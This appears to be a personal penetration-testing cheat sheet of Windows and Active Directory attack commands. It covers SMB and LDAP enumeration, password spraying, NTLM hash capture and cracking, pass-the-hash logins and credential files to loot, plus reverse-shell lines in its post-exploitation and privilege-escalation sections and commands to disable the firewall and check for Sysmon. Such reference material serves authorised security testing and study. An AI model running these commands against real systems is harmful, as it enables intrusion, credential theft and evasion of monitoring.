Print3M
's Hub
HomeBlogNotesSecuriTree
All notes

Windows pentesting notes

1. Kali Linux

/usr/share/windows-resources                # Tools for Windows
/usr/share/peass/winpeas                    # WinPeas binary

2. Important directories

%SystemDrive%\inetpub\                      # IIS data and sites
c:/WINDOWS/system32/drivers/etc/services    # List of services and ports

3. MSRPC

MSRPC can be used to enumerate internal OS information.

enum4linux -a <ip> -u <user> -p <pass>      # Enumerate all info

4. MSSQL

impacket-mssqlclient "<domain>/<user>:<pass>@<ip>"

4.1. Syntax

select @@version                                -- Get OS version
select user_name()                              -- Get current OS username
select name,crdate from master.dbo.sysdatabases -- List all databases
use <db>                                        -- Use database (context)
 
-- List all tables of current DB
select TABLE_NAME from INFORMATION_SCHEMA.TABLES

4.2. Manual enumeration

rpcclient -U "" <ip>                        # Login anonymously
rpcclient -U "<DOMAIN>\\<user>" <ip>        # Login with credentials
> ?                                         # List all commands
> srvinfo                                   # Server info
> enumdomusers                              # Enum users
> enumdomgroups                             # Enum groups
> enumdomains                               # Enum domains
> netshareenumall                           # Enum SMB shares
> queryuser <user-name>                     # Detailed user's info
> lookupnames <user-name>                   # Get SID of user
> querygroup <group-rid>                    # Get group info
> enumprivs                                 # Enum current users' privileges
> getusername                               # Get current username

5. SMB (139, 445)

SMB can be used to enumerate OS info (domain, NetBIOS, forest).

5.1. Enumeration

nmap -p 445 --script=smb-os-discovery <ip>
nbtscan <ip>                                
nmblookup -A <ip> 
 
# Anonymous shares enumeration 
smbclient -L //ip>
smbmap -H <ip>
 
# Shares enumeration using credentials
crackmapexec smb <ip> -u <user> -p <pass> --shares
smbclient -L //<ip>/ -U "<domain>/<username>%<password>"
smbmap -H <ip> -u <username> -p <password> -d <domain>
 
# Mount SMB share
sudo mount -t cifs -o "user=<username>,password=<password>" //<ip>/<share> /mnt/<dir>

5.2. Password spraying

crackmapexec smb <ip> -u <user-file> -p <pass-file> --continue-on-success

5.3. Connection / shell

# Connect to share by credentials
smbclient //ip>/<share> [-U "<DOMAIN>\\<user>%<pass>"]
> get <file>                                # Get file
> put <local-file>                          # Upload file
> exit                                      # Exit
 
# Connect and execute command at once
smbclient [...] -c "<smb-command>"
 
# GUI connection (and standard terminal further)
xdg-open smb://<ip>/<share>
 
# Try to get shell via SMB
impacket-smbexec <domain>/<user>[:password]@<ip>

Known exploit: EternalBlue MS17-010

6. Kerberos

# Kerberos can be used to enumerate info and bruteforce passwords
kerbrute username -d <domain> --dc <dc-ip> <wordlist-file>
 
# Grab Kerberos hash
impacket-netview <domain/username> -no-pass

7. WinRM

evil-winrm -i <ip> -u <username> -H <hash>  # Login by hash
evil-winrm -i <ip> -u <username> -p <pass>  # Login by password

8. NTLM

responder -I <iface> -dw                    # Sniff NTLM auth attempt
hashcat -m 5600 <hash-file> <wordlist>      # Crack NTLMv1 hash
hashcat -m 5600 <hash-file> <wordlist>      # Crack NTLMv2 hash

8.1. NT hash stealing

More places to steal NTLM.

Places and tricks to steal NT hashes. The trick is to force victim server to auth attempt with attacker host. Places to check:

  • desktop.ini - can contain //<my-ip>/ OR \\<my-ip>\ line; often available on SMB shares.

9. LDAP

responder -I <iface> -dw                    # Sniff LDAP auth attempt

10. WMI

# Try to get shell via WMI
impacket-wmiexec <domain>/<user>[:password]@<ip>

11. IIS

TBD

12. FTP

TBD

13. PXE boot image

Powershell script for extracting interesting data from PXE.

14. Interesting files to loot

C:\Windows\System32\drivers\etc\hosts       # /etc/hosts
C:\inetpub\logs\LogFiles\W3SVC1\            # IIS logs
C:\inetpub\wwwroot\web.config               # IIS config
C:\xampp\apache\logs\                       # XAMPP logs
C:\xampp\passwords.txt                      # XAMPP credentials

15. Reconnaissance

15.1. NFS

showmount -e <ip>                           # List NFS shares
mount -t nfs <ip>:/<share> <dest-dir>       # Mount NFS share

15.2. NetBIOS

nmblookup -A <ip>
nbtscan <ip>/<mask-bits>
nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n <IP>

15.3. SNMP

public is common default "public string" for SNMP service.

snmp-check <ip> -c <pub-string>             # Nice-looking enumeration      
snmpwalk -v <ver> -c <pub-string> <ip> -m + # Enumerate MIB data
[...] NET-SNMP-EXTEND-MBI::nsExtendObjects  # Detect SNMP extend

15.4. LDAP

# Enumerate top-level AD objects anonymously
ldapsearch -H ldap://<ip>:389/ -x -s base -b '' "(objectClass=*)" "*" +
 
# Enumerate all AD sub-objects of DN string (domain)
ldapsearch -H ldap://10.10.10.182:389/ -x -s sub -b 'DC=<hostname>,DC=<domain>' "(objectClass=*)" "*" +
 
# Connect to LDAP using credentials
ldapsearch -x -H ldap://<ip>:<port> -D "<DOMAIN>\\<user>" -w <pass>

16. Post-exploitation

16.1. CMD and Powershell

  • ss64 - powershell and CMD commands cheat-sheet
nc.exe -e powershell <my-ip> <my-port>      # Connect shell to listener
 
# Download file (tip: check file integrity)
Invoke-WebRequest -URI <url> -OutFile <file>
 
Get-FileHash <file> -Algorithm MD5          # Calculate MD5 file hash
gci env:* | sort-object name                # List env variables
 
get-localuser                               # List all local users
Get-NetAdapter -Name * -IncludeHidden       # List all network adapters
ipconfig /all                               # Show network configuration
net share                                   # List local SMB shares
net view \\<machine> /all                   # List remote SMB shares
net start                                   # List services
net user                                    # List all local users
net user <username>                         # Get info about local user
net localgroup                              # List all local groups   
net localgroup <group>                      # Get info about local group
net accounts                                # List local password policy
netstat -avb -p <TCP|UDP>                   # List open ports
arp -a                                      # List ARP table (discover hosts)
tasklist                                    # List processes
systeminfo                                  # Get local system and AD info
get-service WinDefend                       # Get state of Windows Defender
Get-MpComputerStatus                        # Get status of AV software
Get-MpThreat                                # Get details of detected threat
Get-NetFirewallProfile                      # List profiles of local firewall
Get-NetFirewallRule                         # List rules of local firewall
req query <registry-key>                    # Get Windows registry key value
Get-ExecutionPolicy                         # Check current execution policy
 
 
# Find TCP port by service PID
netstat -noa | findstr "LISTENING" | findstr <PID>
netstat
  -a                                        # List listening ports only
  -b                                        # Show assigned binary
  -n                                        # Do not resolve IP
  -o                                        # Show PID
 
# Get event logs
Get-EventLog -List        
Get-EventLog -LogName System -EntryType Error      
 
# Disable firewall profiles
Set-NetFirewallProfile -Profile Domain,Public,Privarte - Enabled False
 
# Test for connections to other machines
Test-NetConnection -ComputerName 127.0.0.1 -Port 80
(New-Object System.Net.Sockets.TcpClient("127.0.0.1", "80")).Connected
 
# Sysmon detection tricks
Get-Process | Where-Object { $_.ProcessName -eq "Sysmon" }
Get-CimInstance win32_service -Filter "Description = 'System Monitor service'"
Get-Service | where-object {$_.DisplayName -like "*sysm*"}
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational
findstr /si '<ProcessCreate onmatch="exclude">' C:\tools\*

16.2. Active Directory information gathering

CMD:

net user /domain                            # List all AD users
net user <username> /domain                 # Get info about AD user
net group /domain                           # List all AD groups
net group <group> /domain                   # Get info about AD group
net accounts /domain                        # Get AD password policy
systeminfo | findstr Domain                 # Get AD domain name

PowerShell:

# IMPORTANT: `import-module ActiveDirectory` might be required.
get-aduser -filter * <user>                 # User info
get-adgroup <group>                         # Group info
get-adforest                                # Active forest info
get-addomain -server <DC>                   # Get info about current AD domain
 
# Get full info about AD user
get-aduser -identity <username> -server <DC> -properties *
 
# Get AD users by Distinguished Name
get-aduser -filter * -searchbase <DN>
 
# Get full info about AD group
get-adgroup -identity <group> -server <DC> -properties *

17. Privilege escalation

17.1. Weakness discovering

Seatbelt - Windows security enumeration script

whoami /priv                                # List privileges of user
whoami /groups                              # List groups of user
winpeas.exe                                 # Enumerate potential findings

17.2. Run command as a different user

There are some commands that don't have option to specify domain credentials with them. The workaround of this problem is to start new local shell using target domain account and run the mentioned commands as target user.

Windows has a built-in runas.exe binary. It allows to run any command as a different user. This command doesn't authenticate credentials against a DC (they are only injected into memory). The /netonly flag makes credentials to be used everywhere to domain authentication. Sometimes the binary might not be present on a real server.

runas.exe /netonly /user:<domain>\<username> "<command>"
 
# We have to check if the credentials work. Every AD account
# (even with the lowest privileges) has access to the SYSVOL folder.
dir \\<FQDN>\SYSVOL\                        # Using Kerberos auth
dir \\<IP>\SYSVOL\                          # Using NTLM auth

There are other non-default tools:

  • JuicyPotatoNG - local priv-escalation tool
  • RunasCs - tool to open shell connection as a different user
.\runascs.exe -d <domain> <user> <pass> cmd.exe -r <my-ip>:<my-port>